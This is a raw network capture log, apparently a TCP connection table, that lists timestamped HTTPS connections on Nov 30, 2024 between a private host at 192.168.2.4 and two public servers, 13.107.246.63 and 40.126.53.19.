                                                                                                                    Nov 30, 2024 11:35:05.946702003 CET49796443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:05.946841002 CET49796443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:05.946854115 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.022806883 CET4434979313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.022852898 CET4434979313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.022895098 CET49793443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:06.023009062 CET49793443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:06.023024082 CET4434979313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.023031950 CET49793443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:06.023036957 CET4434979313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.024831057 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:06.024864912 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.024931908 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:06.025053978 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:06.025065899 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656301975 CET4434979040.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656321049 CET4434979040.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656358004 CET4434979040.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656385899 CET49790443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.656394005 CET4434979040.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656421900 CET49790443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.656703949 CET49790443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.656713009 CET4434979040.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656721115 CET49790443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.656826019 CET4434979040.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656852007 CET4434979040.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.656888008 CET49790443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.676434040 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.676454067 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:06.676537037 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.676707029 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:06.676717997 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.115586042 CET4434979413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.116322041 CET49794443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.116345882 CET4434979413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.116746902 CET49794443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.116753101 CET4434979413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.559875011 CET4434979413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.559932947 CET4434979413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.559983969 CET49794443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.560175896 CET49794443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.560187101 CET4434979413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.560235023 CET49794443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.560239077 CET4434979413.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.562748909 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.562778950 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.562870979 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.563016891 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.563028097 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.640532970 CET4434979513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.640894890 CET49795443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.640928984 CET4434979513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.641277075 CET49795443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.641282082 CET4434979513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.726109028 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.726510048 CET49796443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.726531029 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.726917028 CET49796443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.726922035 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.882596016 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.883001089 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.883025885 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:07.883404016 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:07.883410931 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.094084024 CET4434979513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.094126940 CET4434979513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.094185114 CET49795443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.094332933 CET49795443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.094352007 CET4434979513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.094361067 CET49795443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.094366074 CET4434979513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.096653938 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.096669912 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.096741915 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.096870899 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.096883059 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.171982050 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.172025919 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.172075987 CET49796443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.172178030 CET49796443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.172192097 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.172204971 CET49796443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.172209024 CET4434979613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.173911095 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.173986912 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.174119949 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.174237013 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.174272060 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.311754942 CET4434978713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.311815023 CET4434978713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.311861992 CET49787443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.311968088 CET49787443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.311975002 CET4434978713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.311981916 CET49787443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.311985016 CET4434978713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.313590050 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.313601017 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.313671112 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.313776016 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.313787937 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.336986065 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.337136984 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.337222099 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.342097044 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.342123032 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.342133045 CET49797443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.342140913 CET4434979713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.344491005 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.344532013 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.344599962 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.344748020 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:08.344774961 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.571718931 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.572395086 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:08.572407007 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.572967052 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:08.572971106 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:08.573008060 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:08.573014021 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.287158966 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.287172079 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.287256956 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.287341118 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:09.287638903 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:09.287651062 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.287661076 CET49798443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:09.287664890 CET4434979840.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.309946060 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:09.309973001 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.310050964 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:09.310178995 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:09.310193062 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.343930006 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.344265938 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.344285011 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.344696999 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.344701052 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.788310051 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.788372040 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.788415909 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.788585901 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.788613081 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.788626909 CET49799443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.788633108 CET4434979913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.791325092 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.791366100 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.791429996 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.791584969 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.791596889 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.876749992 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.877418995 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.877432108 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.877866030 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.877872944 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.953551054 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.954083920 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.954119921 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:09.954566956 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:09.954583883 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.094316959 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.095062017 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.095074892 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.095592022 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.095597982 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.124121904 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.124419928 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.124445915 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.124754906 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.124766111 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.321305037 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.321357965 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.321479082 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.321697950 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.321707964 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.321716070 CET49800443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.321719885 CET4434980013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.324063063 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.324090004 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.324174881 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.324301004 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.324314117 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.401443005 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.401487112 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.401556969 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.407993078 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.407993078 CET49801443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.408026934 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.408055067 CET4434980113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.410388947 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.410444021 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.410533905 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.410665035 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.410676003 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.538845062 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.538904905 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.538949013 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.539047003 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.539052010 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.539060116 CET49802443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.539063931 CET4434980213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.540867090 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.540926933 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.541011095 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.541119099 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.541147947 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.571930885 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.571978092 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.572045088 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.572141886 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.572160959 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.572184086 CET49803443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.572196960 CET4434980313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.573745012 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.573756933 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:10.573820114 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.573916912 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:10.573926926 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:11.201394081 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:11.201852083 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:11.201869965 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:11.202373981 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:11.202378988 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:11.202408075 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:11.202414989 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:11.636204004 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:11.636647940 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:11.636672974 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:11.637054920 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:11.637061119 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.038793087 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.039227009 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.039241076 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.039663076 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.039666891 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.090205908 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.090270042 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.090393066 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.090495110 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.090507984 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.090542078 CET49805443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.090547085 CET4434980513.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.092958927 CET49810443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.093023062 CET4434981013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.093110085 CET49810443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.093255043 CET49810443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.093288898 CET4434981013.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.193603992 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.194120884 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.194144011 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.194535971 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.194541931 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.322765112 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.323136091 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.323188066 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.323508978 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.323523045 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.443577051 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.446249962 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.446271896 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.446738958 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.446743965 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.473426104 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.473479986 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.473531961 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.473694086 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.473706961 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.473716974 CET49806443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.473721027 CET4434980613.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.476192951 CET49811443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.476214886 CET4434981113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.476305962 CET49811443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.476449013 CET49811443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.476460934 CET4434981113.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.642580986 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.642642021 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.642698050 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.642857075 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.642874956 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.642884016 CET49807443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.642889023 CET4434980713.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.645206928 CET49812443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.645224094 CET4434981213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.645294905 CET49812443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.645447969 CET49812443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.645458937 CET4434981213.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.766609907 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.766664028 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.766732931 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.766840935 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.766840935 CET49808443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.766872883 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.766896009 CET4434980813.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.768682003 CET49813443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.768698931 CET4434981313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.768773079 CET49813443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.768888950 CET49813443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.768901110 CET4434981313.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.879857063 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.879888058 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.879925966 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.879956007 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:12.879966974 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.879985094 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:12.880008936 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:12.880250931 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:12.880263090 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.880274057 CET49804443192.168.2.440.126.53.19
                                                                                                                    Nov 30, 2024 11:35:12.880279064 CET4434980440.126.53.19192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.897556067 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.897609949 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.897665977 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.897819996 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.897831917 CET4434980913.107.246.63192.168.2.4
                                                                                                                    Nov 30, 2024 11:35:12.897842884 CET49809443192.168.2.413.107.246.63
                                                                                                                    Nov 30, 2024 11:35:12.897846937 CET4434980913.107.246.63192.168.2.4
